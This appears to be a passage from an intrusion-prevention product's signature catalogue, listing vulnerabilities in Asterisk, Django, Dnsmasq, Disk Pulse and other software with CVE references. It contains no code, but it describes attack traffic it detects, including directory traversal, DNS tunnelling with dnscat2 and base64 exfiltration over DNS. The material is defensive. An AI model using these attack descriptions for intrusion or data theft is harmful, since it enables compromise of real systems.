Generic_CS-Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow

References:

CVE-2012-2415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2415

OSVDB-81455
http://www.osvdb.org/81455

Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference

About this vulnerability:

A Digium Asterisk Skinny Channel Null-Pointer Dereference vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Null Pointer Dereference

Description:

A vulnerability in Digium Asterisk which allows remote attackers to cause a denial of service condition by closing a connection to the Asterisk server in certain call states, due to incorrect handling of a closed client connection in the SCCP channel driver.

Situation:

Generic_CS-Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference

References:

CVE-2012-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2948

Digium-Asterisk-Tls-Certificate-Common-Name-Null-Byte-Input-Validation-Error

About this vulnerability:

A vulnerability in Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

A policy bypass vulnerability exists in Digium Asterisk. The vulnerability is due to incorrectly validating the common name in a certificate. It can be exploited by using a NULL character after the portion of the common name that Asterisk expects. By exploiting this vulnerability, a remote attacker can conduct variety of attacks including man-in-the-middle.

Situation:

HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error

References:

CVE-2015-3008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3008

OSVDB-120492
http://www.osvdb.org/120492

Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-1129-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk Open Source; Digium Certified Asterisk

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in Digium Asterisk. The vulnerability is due to improper handling of RTP packets with unnegotiated Payload Types. A remote attacker could exploit this vulnerability by sending crafted RTP packets to the target server. Successful exploitation results in denial-of-service conditions on the target service.

Situation:

Generic_UDP-Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service

References:

CVE-2018-7285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7285

Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1121-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk Open Source

Type:

Input Validation

Description:

There has been reported a denial-of-service vulnerability in Digium Asterisk. Successful exploitation could result in denial-of-service condition.

Situation:

HTTP_CS-Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
WebSocket_CS-Zero-Payload

References:

CVE-2018-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7287

Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service

About this vulnerability:

A vulnerability in multiple Asterisk products

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Resource Starvation

Description:

The IAX2 channel driver (chan_iax2) in Asterisk before 1.2.22 and 1.4.x before 1.4.8, Business Edition before B.2.2.1, AsteriskNOW before beta7, Appliance Developer Kit before 0.5.0, and s800i before 1.0.2 allows remote attackers to cause a denial of service (crash) via a crafted (1) LAGRQ or (2) LAGRP frame that contains information elements of IAX frames, which results in a NULL pointer dereference when Asterisk does not properly set an associated variable.

Situation:

Generic_UDP-Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service

References:

CVE-2007-3763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3763

BID-24950
http://www.securityfocus.com/bid/24950

Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service

About this vulnerability:

A denial of service vulnerability in Digium Asterisk

Risk:

High

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

There is a denial of service vulnerability in multiple Asterisk products. The vulnerability is due to a segfault in Skinny Channel Driver when Asterisk receives a packet where the claimed length of the data is between 0 and 3, followed by a packet of length of 4 or more bytes. Remote unauthenticated attackers could exploit this vulnerability using specially crafted packets. Successful exploitation would result in a denial of service condition.

Situation:

Generic_CS-Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service

References:

CVE-2007-3764
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3764

BID-24950
http://www.securityfocus.com/bid/24950

Digmine-Cryptocurrency-Miner

About this vulnerability:	Digmine Cryptocurrency Miner
Risk:	High
First detected in:	sgpkg-ips-1027-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Digmine is a cryptocurrency miner, which uses target's computer to mine cryptocurrency.
Situation:	HTTP_CSH-Digmine-Cryptocurrency-Miner

DirectConnect-ConnectToMe-DOS

About this vulnerability:	A denial of service attack using Direct Connect client-to-client handshakes
Risk:	Moderate
First detected in:	sgpkg-ips-108-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Resource Starvation
Description:	Certain Direct Connect hubs can be used to cause DDOS attacks by instructing connected Direct Connect clients to connect to a given ip/port pair. With large hubs that have a large number number of clients connected, this can be used to launch DDOS attacks against selected hosts.
Situation:	DNS-TCP_DirectConnect-Client-To-Client-Handshake HTTP_CS-DirectConnect-Client-To-Client-Handshake SMTP_DirectConnect-Client-To-Client-Handshake

DirectConnect-Peer-To-Peer-Network-Usage

About this vulnerability:	DirectConnect Peer-to-Peer Network usage
Risk:	Moderate
First detected in:	sgpkg-ips-12-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	DirectConnect
Type:	Peer-to-Peer
Description:	DirectConnect is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	P2P-TCP_DirectConnect-Key P2P-TCP_DirectConnect-Lock

Directory-Pro-Directory-Traversal

About this vulnerability:

Cosmicperl Directory Pro 2.0 directory traversal file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Directory Pro

Type:

Directory Traversal

Description:

Cosmicperl Directory Pro 2.0 has a file disclosure vulnerability that can allow the attacker to view arbitrary files on the system. The problem is in insufficient input validation of the 'show' parameter for the directorypro.cgi script, allowing the attacker to step out of the Web server context and view files with arbitrary extensions.

References:

CVE-2001-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0780

BID-2793
http://www.securityfocus.com/bid/2793

Directory-Traversal

About this vulnerability:	Directory traversal detected
Risk:	High
First detected in:	sgpkg-ips-447-4219
Last changed:	sgpkg-ips-1769-5242
Platform:	Generic
Software:	Any Software
Type:	Malfunction
Description:	Directory traversal, such as "../", has been detected. This may be an attempt to access a file on the server that is not intented to be accessible.
Situation:	HTTP_CSU-Windows-Style-Absolute-Path-In-URI HTTP_CSU-Suspected-Dot-Dot-Slash-Directory-Traversal HTTP_CSU-Dotdotdot-Directory-Traversal HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence HTTP_CSH-Windows-Style-Absolute-Path-In-Referer-Header HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal

Directory-Traversal-In-Archive-Filename

About this vulnerability:

A vulnerability in Schneider Electric IIoT Monitor

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Directory Traversal

Description:

A file name containing a directory traversal attempt ".." was seen. This may be used to exploit various vulnerabilities in different implementations of zip decompressors.

Situation:

File-Zip_Directory-Traversal-In-Archive-Filename

References:

CVE-2018-7836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7836

Disk-Pulse-Enterprise-GET-Buffer-Overflow

About this vulnerability:	A Disk Pulse Enterprise GET Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-1016-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Disk Pulse
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Disk Pulse Enterprise 9.9.16 which allows remote attackers to execute a payload in the Authority/System context by sending a crafted HTTP GET request.
Situation:	HTTP_CSU-Disk-Pulse-Enterprise-GET-Buffer-Overflow

Disk-Pulse-Enterprise-Server-Cleint-Compnent-XML-Buffer-Overflow

About this vulnerability:	An attempt to exploit a Disk Pulse Enterprise Server Client Component XML Buffer Overflow vulnerability detected
Risk:	High
First detected in:	sgpkg-ips-983-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Disk Pulse
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in DiskPulse Enterprise Server which allows remote attackers to execute arbitrary code via a malicious XML file due to improper bounds checking when importing commands.
Situation:	File-TextId_Disk-Pulse-Enterprise-Server-Client-Component-XML-Buffer-Overflow

Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow

About this vulnerability:	A Disk Pulse Enterprise Server Login Request Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-838-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Disk Pulse
Type:	Buffer Overflow
Description:	A buffer overvlow vulnerability in Disk Pulse Enterprise Server, version 9.0.34, which allows remote attackers to execute arbitrary code due to the lack of proper bounds checking in the credential parameters.
Situation:	HTTP_CRL-Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow

Disk-Savvy-Enterprise-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Disk Savvy Enterprise
Risk:	High
First detected in:	sgpkg-ips-1112-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	DiskSavvy
Type:	Buffer Overflow
Description:	A stack based buffer overflow vulnerability in Disk Savvy Enterprise, version 10.4.18, which allows remote attackers to execute arbitrary code due to the improper bounds checking of the request sent to the built-in server.
Situation:	Generic_CS-Disk-Savvy-Enterprise-Stack-Buffer-Overflow

distcc-Remote-Shell-Execution

About this vulnerability:

A vulnerability in distcc

Risk:

High

First detected in:

sgpkg-ips-309-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

distcc

Type:

Configuration Error

Description:

distcc is a system that allows distribution of compilation tasks over the network. By design, it allows execution of arbitatry commands from remote systems. When not configured correctly, it may allow unauthorized command execution.

Situation:

Generic_CS-distcc-Remote-Shell-Execution

References:

CVE-2004-2687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

OSVDB-13378
http://www.osvdb.org/13378

Distinct-TFTP-Directory-Traversal

About this vulnerability:

A Distinct TFTP Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Distinct

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Distinct TFTP 3.10 that allows remote attackers to write and execute arbitrary files, which results in code execution under the context of System.

Situation:

TFTP_Distinct-TFTP-Directory-Traversal

References:

CVE-2012-6664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6664

OSVDB-80984
http://www.osvdb.org/80984

DivX-ActiveX-Browser-Plugin-Denial-of-Service

About this vulnerability:

A vulnerability in DivX Browser Plugin

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DivX Browser Plugin

Type:

Input Validation

Description:

There is a denial of service flaw in DivX Browser Plugin.

Situation:

File-Text_DivX-ActiveX-Browser-Plugin-Denial-of-Service

References:

CVE-2007-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0429

BID-22133
http://www.securityfocus.com/bid/22133

OSVDB-37693
http://www.osvdb.org/37693

DivX-Player-Subtitle-Parsing-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in DivX Player

Risk:

High

First detected in:

sgpkg-ips-151-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DivX Player

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in DivX Player. A remote attacker can exploit this vulnerability by persuading a user to open a malicious subtitles file with a vulnerable version of DivX Player. Successful exploitation could allow the attacker to execute arbitrary code.

Situation:

Shared_SS-DivX-Player-Subtitle-Parsing-Buffer-Overflow
File-Text_DivX-Player-Subtitle-Parsing-Buffer-Overflow

References:

CVE-2008-1912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1912

BID-28799
http://www.securityfocus.com/bid/28799

OSVDB-44402
http://www.osvdb.org/44402

DJ-Studio-Pro-Stack-Buffer-Overflow

About this vulnerability:

A DJ Studio Pro Stack Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-801-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DJ Studio Pro

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in DJ Studio Pro version 5.1.6.5.2, and related products Audiotran version 1.4.1 and Audio Workstation version 6.4.2.4.3, that allows remote attackers to execute arbitrary code via a long string in a playlist file.

References:

CVE-2009-4656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4656

OSVDB-58159
http://www.osvdb.org/58159

Django-Get_Supported_Language_Variant-Denial-Of-Service

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

Moderate

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

Django

Type:

Input Validation

Description:

Improper input validation in the get_supported_language_variant method causes a vulnerability in Django. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

HTTP_CSH-Django-Get_Supported_Language_Variant-Denial-Of-Service

References:

CVE-2024-39614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39614

Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402

About this vulnerability:

A vulnerability in Django

Risk:

High

First detected in:

sgpkg-ips-1830-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Generic

Software:

Django

Type:

SQL Injection

Description:

A SQL injection vulnerability exists in Django versions 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4. A remote attacker can use this vulnerability to execute arbitrary SQL queries by passing a specifically crafted tolerance parameter to GIS functions and aggregates on Oracle.

Situation:

HTTP_CSU-Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402

References:

CVE-2020-9402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9402

Django-Multipartparser-Infinite-Loop-DoS

About this vulnerability:

A vulnerability in the HTTP multipart parser of Django.

Risk:

High

First detected in:

sgpkg-ips-1460-5242

Last changed:

sgpkg-ips-1460-5242

Platform:

Linux; Unix

Software:

Django

Type:

Infinite Loop

Description:

A vulnerability in the the HTTP multipart parser of Django, versions prior to 2.2.27, prior to 3.2.12, prior to 4.0.2, which allow remote attackers to cause a denial of service condition by sending a crafted multipart HTTP request to the target server, due to improper validation of multipart requests.

Situation:

Generic_CS-Django-Multipartparser-Infinite-Loop-DoS

References:

CVE-2022-23833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23833

Django-Multipartparser.py-Parse-Denial-Of-Service

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

Django

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in the Django web framework. The vulnerability is due to resource exhaustion when parsing a large number of files in multipart/form-data requests. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in denial of service conditions on the target server.

Situation:

HTTP_CS-Django-Multipartparser.py-Parse-Denial-Of-Service

References:

CVE-2023-24580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24580

Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

High

First detected in:

sgpkg-ips-1621-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

Django

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported for Django. This vulnerability is due to resource exhaustion when handling the Accept-Language header. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

HTTP_CSH-Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion

References:

CVE-2023-23969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23969

Django-QuerySet-Order_By-SQL-Injection

About this vulnerability:

A vulnerability in Django

Risk:

Moderate

First detected in:

sgpkg-ips-1838-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

Generic

Software:

Django

Type:

Input Validation

Description:

Improper input validation in the order_by function causes an SQL injection vulnerability in Django. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Django-QuerySet-Order_By-SQL-Injection

References:

CVE-2021-35042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35042

Django-Trunc-And-Extract-SQL-Injection

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

Moderate

First detected in:

sgpkg-ips-1489-5242

Last changed:

sgpkg-ips-1489-5242

Platform:

Generic

Software:

Django

Type:

Input Validation

Description:

Insufficient sanitization of user input to kind and lookup_name parameter passed to the Trunc and Extract database functions causes an SQL injection vulnerability in Django. A successful attack allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Django-Trunc-And-Extract-SQL-Injection

References:

CVE-2022-34265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34265

Django-Urlize-Urlizetrunc-Denial-Of-Service

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

Moderate

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

Django

Type:

Input Validation

Description:

Improper input validation in the urlize and urlizetrunc filters causes a denial of service vulnerability in Django.

Situation:

HTTP_CRL-Django-Urlize-Urlizetrunc-Denial-Of-Service

References:

CVE-2024-45230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45230

Django-Usernamefield-Denial-Of-Service

About this vulnerability:

A vulnerability in Django

Risk:

Moderate

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1714-5242

Platform:

Generic

Software:

Django

Type:

Malfunction

Description:

Slow NFKC normalization of the UsernameField value on Windows causes a denial of service vulnerability in Django.

Situation:

HTTP_CRL-Django-Usernamefield-Denial-Of-Service

References:

CVE-2023-46695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46695

Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699

About this vulnerability:

A vulnerability in Django Software Foundation Django

Risk:

Moderate

First detected in:

sgpkg-ips-1862-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Generic

Software:

Django

Type:

Input Validation

Description:

Improper input validation in the wordwrap filter causes a denial of service vulnerability in Django.

Situation:

HTTP_CRL-Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699

References:

CVE-2025-26699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26699

DjVu-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in DjVu ActiveX Control for Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-187-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DjVu ActiveX Control for Microsoft Office

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in DjVu ActiveX control for Microsoft Office. DjVu is a digital document format. The ActiveX control contains a buffer overflow in a specific method which may allow arbitary code execution in the context of the current user.

Situation:

HTTP_SS-DjVu-ActiveX-Control-Buffer-Overflow
File-Text_DjVu-ActiveX-Control-Buffer-Overflow

References:

BID-31987
http://www.securityfocus.com/bid/31987

DLINK-DWL-2600-Authenticated-RCI

About this vulnerability:

A vulnerability in DLINK DWL-2600

Risk:

High

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Linux

Software:

DLINK DWL-2600

Type:

Input Validation

Description:

There exists a vulnerability in DLINK DWL-2600, firmware version 4.2.0.15 Rev A, which allows remote attackers to execute arbitrary system commands through the configRestore and configServerip parameters in a POST to admin.cgi?action=config_restore, due to the lack of user input validation.

Situation:

HTTP_CS-DLINK-DWL-2600-Authenticated-RCI

References:

CVE-2019-20499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20499

DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Windows.

Situation:

File-OLE_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-RTF_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-TextId_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-Text_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

References:

CVE-2016-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0041

MS16-014
http://technet.microsoft.com/security/bulletin/MS16-014

DLL-Planting-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Windows. The vulnerability is due to a design weakness when loading certain DLL files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted file from certain locations. Successful exploitation could result in arbitrary code execution in the security context of the target user.

Situation:

File-Binary_DLL-Planting-Remote-Code-Execution-Vulnerability

References:

CVE-2015-0096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0096

OSVDB-66387
http://www.osvdb.org/66387

MS15-020
http://technet.microsoft.com/security/bulletin/MS15-020

dnaLIMS-Admin-Module-Command-Execution

About this vulnerability:

An attempt to exploit a dnaLIMS Admin Module Command Execution vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-980-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux;Unix

Software:

dnaLIMS

Type:

Code Injection

Description:

A vulnerability in dnaLIMS which allows remote attackers to execute commands via the administrative module.

Situation:

HTTP_CRL-dnaLIMS-Admin-Module-Command-Execution

References:

CVE-2017-6526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6526

dnaLIMS-Directory-Traversal

About this vulnerability:

A dnaLIMS Directory Traversal vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

dnaLIMS

Type:

Input Validation

Description:

A vulnerability in dnaLIMS which allows remote attackers to perform a directory traversal in the 'secID' parameter.

Situation:

HTTP_CRL-dnaLIMS-Directory-Traversal

References:

CVE-2017-6527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6527

BID-96823
http://www.securityfocus.com/bid/96823

DNS-NAPTR-Potential-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft DNS Server

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the Microsoft DNS server component of server versions of the Microsoft Windows Operating System. The vulnerability is due to an improper sign extension when processing NAPTR Resource Records. Remote unauthenticated attackers could leverage this vulnerability by registering a domain, creating a specially crafted NAPTR entry, and sending (possibly via enticement) a DNS query to the target DNS server. Successful exploitation could allow an attacker to execute arbitrary code on the DNS server. Unsuccessful code execution attempts could terminate the DNS server process, leading to a denial-of-service condition.

Situation:

DNS-UDP_Microsoft-Windows2k8-NAPTR-RCE

References:

CVE-2011-1966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1966

MS11-058
http://technet.microsoft.com/security/bulletin/MS11-058

DNS-Out-Of-State-DNS-Response-With-Additional-Record

About this vulnerability:	Out of state DNS response with one or more additional records, not vulnerability.
Risk:	Low
First detected in:	sgpkg-ips-161-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This is not a vulnerability. It is used in a Correlation to detect a large number of out of state (with no DNS request seen) consecutive DNS responses with one or more additional records to detect DNS cache poisoning attempts.
Situation:	Generic_UDP-Out-Of-State-DNS-Response-With-Additional-Record DNS-UDP_Out-Of-State-DNS-Response-With-Additional-Record

DNS-Query-Containing-Base64-Encoded-Data

About this vulnerability:	A DNS query containing base64-encoded data detected
Risk:	High
First detected in:	sgpkg-ips-1650-5242
Last changed:	sgpkg-ips-1650-5242
Platform:	Generic
Software:	Any Software
Type:	Backdoor
Description:	This fingerprint detects DNS queries that contain base64 encoded data. They are usually seen in DNS tunneling techniques, in which malicious actors utilize the DNS protocol to create covert channels from inside company networks to their servers. Instead of using DNS requests and responses to perform legitimate lookups, the actors use them to implement a Command & Control (C2) channel or exfiltrate stolen data.
Situation:	DNS-UDP_DNS-Query-Containing-Base64-Encoded-Data

DNS-Zone-Transfer

About this vulnerability:

DNS Zone Transfer

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic DNS server

Type:

Misconfiguration

Description:

Zone Transfer is an operation where remote client downloads all available information for some zone. Zone transfers occur often in attack preparation phase, but they have also legitimate use.

Situation:

DNS_Transfer-Request

References:

CVE-1999-0532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0532

dnscat2-DNS-Tunnel-Usage

About this vulnerability:	An attempt to use dnscat2 DNS tunneling software
Risk:	High
First detected in:	sgpkg-ips-1215-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	dnscat2 is designed to create an encrypted tunnel over DNS protocol to evade network restrictions.
Situation:	DNS-UDP_dnscat2-DNS-Tunnel-Usage

Dnsmasq-Dhcpv6-Information-Disclosure

About this vulnerability:

A vulnerability in DNSmasq/Mikrotik DNSmasq

Risk:

Moderate

First detected in:

sgpkg-ips-1005-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dnsmasq

Type:

Malfunction

Description:

Insufficient validation of client-sent DHCPv6 messages causes a vulnerability in DNSmasq. A successful exploit may allow an attacker to access information on the server without authentication.

Situation:

Generic_UDP-Dnsmasq-Dhcpv6-Information-Disclosure

References:

CVE-2017-14494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14494

Dnsmasq-Dhcpv6-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in DNSmasq/Mikrotik DNSmasq

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dnsmasq

Type:

Buffer Overflow

Description:

Insufficient validation of DHCPv6 requests causes a buffer overflow vulnerability in DNSmasq. A successful exploit allows an attacker to run arbitrary code on the target system without authentication.

Situation:

Generic_UDP-Dnsmasq-Dhcpv6-Stack-Buffer-Overflow

References:

CVE-2017-14493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14493

Dnsmasq-extract_Name-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Dnsmasq.

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Dnsmasq

Type:

Malfunction

Description:

A vulnerability in Dnsmasq, versions bfore 2.83, which allows remote attackers to execute arbitrary code by sending specially crafted DNS replies to a target server, do to an out-of-bounds write in the extract_name() function.

Situation:

DNS-UDP_Dnsmasq-extract_Name-Out-Of-Bounds-Write

References:

CVE-2020-25682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25682

Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in DNSmasq/Mikrotik DNSmasq

Risk:

Moderate

First detected in:

sgpkg-ips-1009-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dnsmasq

Type:

Buffer Overflow

Description:

Improper handling of ICMP6 router solicitation messages vauses a buffer overflow in dnsmasq. A successful exploit allows an attacker to execute arbitrary code with root privileges.

Situation:

IPv6_Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow

References:

CVE-2017-14492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14492

Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Dnsmasq.

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Dnsmasq

Type:

Malfunction

Description:

Situation:

DNS-UDP_Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write

References:

CVE-2020-25687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25687

Dnsmasq-TFTP-Service-Remote-Heap-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Dnsmasq

Risk:

Moderate

First detected in:

sgpkg-ips-250-3038

Last changed:

